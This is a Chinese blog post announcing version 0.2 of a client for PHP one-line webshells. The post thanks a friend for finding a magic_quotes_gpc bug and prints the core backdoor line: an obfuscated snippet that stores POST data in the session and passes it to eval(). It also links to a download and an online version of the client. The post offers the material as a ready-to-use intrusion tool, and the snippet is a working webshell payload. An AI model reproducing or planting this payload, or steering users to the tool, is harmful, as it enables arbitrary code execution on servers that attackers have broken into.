零魂PHP一句话木马客户端(一键提交版) v0.2

Author:zerosoul(零魂)


2009-11-11(正好是光棍节,晕~)更新内容:

-----------------------------

1.修补了下原始版本有些服务器不能正常运行的大Bug。

2.去掉了提交后的登陆密码验证,提交后直接进入大马界面。

-----------------------------


更新说明:

-----------------------------

这玩意本来就是为了方便自己做的,所以本来只打算对自己负责,呵呵。好马好工具如果传出来必然被传烂掉,但这东西无所谓,又不是多特别的东西,但有时候用着比较方便,所以发出来也无妨。

但是发出来后有朋友告诉我有些服务器上运行没成功,心里顿觉愧疚,发个小东西出来,结果功能还有问题,岂不是欺骗大众。但是一直在忙,除了当时做的时候之外,几乎再没去测试过。昨晚hiphop兄给我说他那有台服务器用不起,本来打算让他发Shell来我正好测试下具体原因,结果他说他已经测试了并告诉是magic_quotes_gpc的原因(是个低级错误...),得谢谢他。


然后花了个把小时详细测试并修改了下

相关关键代码:

session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);

-----------------------------


现在的版本magic_quotes_gpc On和Off都测试OK,不过不知道还有没有其它会造成不正常的因素,实在懒的自己去一个一个测试了,等遇到了再说吧,也欢迎大家反馈。

-----------------------------

下载:

http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client_v0.2.rar

在线使用:

http://evilwares.appspot.com/static/eval.html

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:https://www.yesck.com/post/42/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code